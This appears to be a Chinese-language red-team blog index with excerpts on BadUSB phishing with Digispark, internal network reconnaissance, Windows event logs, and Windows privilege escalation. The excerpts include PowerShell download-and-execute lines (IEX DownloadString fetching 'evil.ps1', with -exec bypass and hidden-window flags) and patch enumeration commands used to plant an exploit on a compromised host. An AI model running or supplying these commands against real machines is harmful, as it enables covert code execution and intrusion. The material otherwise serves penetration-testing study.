Four Phishing Scenes Demo Manual

BadUSB Phishing CS released

Use the tool Digispark, shaped like a USB memory stick, and use the Arduino compilation to burn programs into it.

Install Arduino debugging software

  1. Open the Arduino website Arduino - Home and click Software.

image.png

Read more

简易内网信息收集

内网信息收集

辅助命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// 隐藏窗口
-W Hidden
-WindowStyle Hidden

//非交互模式,不为用户提供交互提示
-NonI
-NonInteractive

//使用IEX(Invoke-Expression)进行远程脚本下载
-IEX(New-ObjectNet.WebClient).DownloadString("127.0.0.1/evil.ps1")

//不加载当前用户的配置文件
-NoP
-NoProfile

//显示logo的启动
-NoLogo

//执行后不退出shell,常用于键盘记录等
-noexit
Read more

Windows 系统事件类型

简介

早期版本中 Windows 日志只有,应用程序,安全,系统和 Setup,新的版本中增加了设置及转发事件日志(默认禁用)。

系统内置的三个核心日志文件(System,Security 和 Application)默认大小均为 20480KB(20MB),记录事件数据超过 20MB 时,默认系统将优先覆盖过期的日志记录。其它应用程序及服务日志默认最大为 1024KB,超过最大限制也优先覆盖过期的日志记录。

登录成功不代表一定是 rdp 登录,所有事件的登录类型都是 4624

Read more

简易提权知识点总结

系统内核溢出漏洞

手动执行发现缺失补丁

  • 当获取到目标机器的 shell 以后,可以通过如下命令来看系统安装了哪些补丁,还具有哪些漏洞
1
2
3
4
whoami /groups //根据下面的Mandatory Label\Medium Mandatory Level 来看自己是一个什么权限

systeminfo //查看当前系统安装了哪些补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn //查看当前系统安装了哪些补丁
  • 使用上传或者[[powershell]]的下载功能来将 exp 放到目标机里边
1
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('192.168.1.1');执行的代码。。。"
Read more